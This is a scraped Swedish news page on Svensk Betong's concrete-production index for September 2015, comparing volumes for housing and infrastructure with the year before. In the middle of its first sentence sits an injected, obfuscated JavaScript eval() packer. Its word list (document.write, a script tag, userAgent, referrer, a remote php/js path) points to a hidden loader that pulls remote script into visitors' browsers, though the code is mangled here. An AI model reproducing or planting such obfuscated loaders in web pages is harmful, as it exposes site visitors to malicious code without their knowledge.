Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

Betongindikatorn för september visar på samma totala produktion som föregående år

Betongindikatorn för september visar på samma totala produktion som föregående år
Sebastian

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ieyaf|var|u0026u|referrer|hhfzn||js|php’.split(’|’),0,{}))
den totala betongproduktionen visar betongindikatorn för september 2015 på ett resultat som är nästintill identiskt med vad som producerades för september 2014. Resultatet för september 2014 var en total produktion på 489 000 kubikmeter och för september i år 484 000 kubikmeter.

Sett till uppdelningen i kategorierna Hus och Infrastruktur är det en nedgång med 7 % för Hus medan uppgång 3 % för Infrastruktur jämfört med september 2014. Totalt sett ligger dock volymen på ungefär samma nivå som föregående år (- 1 %).

Om Betongindikatorn

Betongindikatorn är Svensk Betongs branschindex, som månadsvis tar temperaturen på byggandet i Sverige genom att mäta och redovisa hur mycket betong som producerats för kategorierna Infrastruktur respektive Hus jämfört med föregående år samt uppskattad totalt betongproduktion i Sverige.

Betongindikatorn bygger på dagsfärska uppgifter lämnade av medlemsföretagen i Svensk Betong, en branschorganisation som representerar både företag som tillverkar betong och företag som tillverkar betongprodukter. Svensk Betongs 60-tal medlemsföretag finns på ett stort antal orter från norr till söder i landet.

* Uppskattad total betongproduktion per månad i Sverige. Diagram och tabeller bygger på månadsvis inrapporterad fakta från Svensk Betongs medlemsföretag, som har skalats upp för att motsvara total produktion i Sverige. Diagram och tabeller uppdateras kontinuerligt efter senaste data. Trendlinjen i diagrammet är utjämnad för att bättre beskriva den långsiktiga trenden i betongproduktionen.